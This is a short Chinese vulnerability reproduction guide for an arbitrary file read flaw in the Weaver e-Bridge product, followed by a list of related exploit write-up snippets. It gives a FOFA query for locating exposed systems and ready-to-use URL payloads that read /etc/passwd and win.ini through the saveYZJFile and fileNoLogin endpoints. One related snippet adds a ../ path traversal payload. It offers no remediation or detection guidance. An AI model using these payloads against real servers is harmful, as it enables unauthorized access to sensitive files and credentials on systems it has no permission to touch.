泛微云桥e-Bridge-任意文件读取漏洞

1.资产查找

Fofa: title="泛微云桥 e-Bridge"

2.漏洞描述

泛微云桥e-Bridge存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

3.漏洞复现

1）Linux服务器

（1）在URL后添加payload

payload：/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

（2）在URL后添加/file/fileNoLogin/上一步返回的id

payload：/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49

2）Windows服务器

（1）在URL后添加payload

payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

（2）在URL后添加/file/fileNoLogin/上一步返回的id

payload：/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d

泛微云桥e-Bridge-任意文件读取漏洞相关推荐

安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室发表于云+社区专栏一.漏洞背景漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
gitlab 更新文件_GitLab任意文件读取漏洞公告
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...
phpcms前台注入导致任意文件读取漏洞
关于:phpcms前台注入导致任意文件读取漏洞的修复问题简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...
Grafana 中存在严重的未授权任意文件读取漏洞，已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
mysql任意文件读取漏洞学习
前言最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data ...
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞目录漏洞原理漏洞信息受影响版本 FOFA搜集相关资产漏洞分析&漏洞复现解决方案漏洞原理 Grafana是一 ...
php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...
.exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)
一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口二.漏洞描述: Mini ...
php mail执行命令,PHPMailer 命令执行任意文件读取漏洞利用【含POC】
PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危漏洞POC: PHPMa ...
银达汇智智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
漏洞描述: 银达汇智智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件. 漏洞利用条件: / 漏洞影响范围: 银达汇智智慧综合管理平 ...